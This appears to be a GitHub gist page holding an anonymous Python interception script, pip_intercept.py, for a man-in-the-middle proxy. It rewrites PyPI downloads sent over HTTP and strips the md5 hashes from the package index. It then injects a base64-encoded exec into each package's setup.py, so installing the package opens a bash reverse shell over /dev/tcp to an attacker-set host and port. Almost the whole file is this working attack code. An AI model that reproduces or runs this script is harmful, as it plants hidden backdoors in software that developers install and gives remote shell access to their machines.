anonymous / pip_intercept.py
Created

Embed URL

HTTPS clone URL

SSH clone URL

You can clone with HTTPS or SSH.

Download Gist
View pip_intercept.py
Raw
File suppressed. Click to show.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 
# -*- coding: utf-8 -*-

#

 

import tempfile

import sys, os

import re

 

LHOST, LPORT = ('127.0.0.1', '4444')

 

PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;

           sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))

 

PAYLOAD = PAYLOAD.replace('\n', '')

 

 

def response(context, flow):

    if not 'Content-Type' in flow.response.headers:

        return None

 

    if flow.request.get_url().startswith('http://pypi.python.org/simple/'):

        flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)

 

    if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\

       and flow.request.host == 'pypi.python.org':

 

        tmp_dir = tempfile.mkdtemp()

        os.chdir(tmp_dir)

 

        filename = flow.request.get_path_components()[-1]

 

        open(filename, 'wb').write(flow.response.content)

 

        os.mkdir('extracted')

        os.system('aunpack -X '+tmp_dir+'/extracted '+filename)

 

        os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''

                  '''s".decode("base64"))' ''' %

                  PAYLOAD.encode('base64').replace('\n', ''))



        os.chdir('extracted')

        os.system('apack -f ../%s *' % filename)



        flow.response.content = open('../%s' % filename, 'rb').read()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.